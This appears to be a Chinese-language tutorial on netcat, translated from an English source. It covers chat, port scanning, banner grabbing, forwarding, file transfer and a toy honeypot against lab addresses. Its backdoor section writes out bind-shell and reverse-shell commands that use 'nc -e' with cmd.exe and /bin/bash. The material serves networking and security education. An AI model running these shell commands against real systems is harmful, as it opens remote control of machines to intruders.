Netcat:TCP/IP瑞士军刀
- 聊天
- 端口扫描
- 标志提取
- 端口转发/代理
- 文件传输
- 蜜罐
- RAT/后面
让我们先看一下netcat的help:
root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
| -c shell commands | as `-e’; use /bin/sh to exec [dangerous!!] |
| -e filename | program to exec after connect [dangerous!!] |
| -b | allow broadcasts |
| -g gateway | source-routing hop point[s], up to 8 |
| -G num | source-routing pointer: 4, 8, 12, … |
| -h | this cruft |
| -i secs | delay interval for lines sent, ports scanned |
| -k | set keepalive option on socket |
| -l | listen mode, for inbound connects |
| -n | numeric-only IP addresses, no DNS |
| -o file | hex dump of traffic |
| -p port | local port number |
| -r | randomize local and remote ports |
| -q secs | quit after EOF on stdin and delay of secs |
| -s addr | local source address |
| -T tos | set Type Of Service |
| -t | -t answer TELNET negotiation |
| -u | UDP mode |
| -v | -v verbose [use twice to be more verbose] |
| -w secs | timeout for connects and final net reads |
| -z | zero-I/O mode [used for scanning] |
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp\-data’).
用NETCAT聊天:
机器A(BT):root@bt:- # nc –l –p 123
机器B(windows):C:\> nc 192.168.118.130 123
端口扫描:
在扫描端口的工具中netcat并不算很好,但是我们还是来介绍一下吧。
C:\> nc –v –w 2 –z 192.168.118.130 1-100
标志提取:
C:\> NC-VV 192.168.118.130 80
下图为我们使用探测192.168.118.130主机80端口,返回web服务器头为Apache/2.2.14
端口转发:
如果遇到防火墙限制端口那就可以用到这个喽。
机器A:root@bt:- # nc –l –p 8008 –c “nc google.com 80″
机器B:Browse 192.168.118.130:8008
文件传输:
机器A: root@bt:- # nc –lv -p 123 > test.txt
机器B:C:\> nc 192.168.118.130 123 < test1.txt
蜜罐:
你可以用netcat建立一个简单的蜜罐。
机器A:root@bt:- # nc –lvvp 443 < apache2.txt
机器B: C:\> nc 192.168.118.130 443
后门:
1、windows 下捆绑端口 www.2cto.com
机器B: C:\> nc –lvvp 1234 –e cmd.exe [监听1234端口, 程序重定向cmd.exe]
机器A: root@bt:- # nc –v 192.168.118.1 1234 [连接1234端口]
2、反弹SHELL
机器B : C:\> nc –lvvp 1234
机器A: root@bt:- # nc –v 192.168.118.1 1234 –e /bin/bash
再介绍几款NETCAT的增强软件
1、cryptcat 加密的netcat (http://sourceforge.net/projects/cryptcat/files/)
2、Ncat是面向21世纪的netcat,是Nmap工具集的一部分。(http://www.oschina.net/p/ncat/)
NCAT ssl 传输文件
机器A: root@bt:- # Ncat –l –ssl 123 >Ncattest.txt
机器B:C:\>Ncat 192.168.118.130 123 –ssl < test2.txt
3、socat是一個netcat(nc)的替代產品,可以稱得上nc++。(http://www.oschina.net/p/socat/)
翻译修改自:http://resources.infosecinstitute.com/netcat-tcpip-swiss-army-knife/
上一篇: 分析UltraEdit学习PE文件格式
下一篇: 浏览器HTTP的缓存机制(续)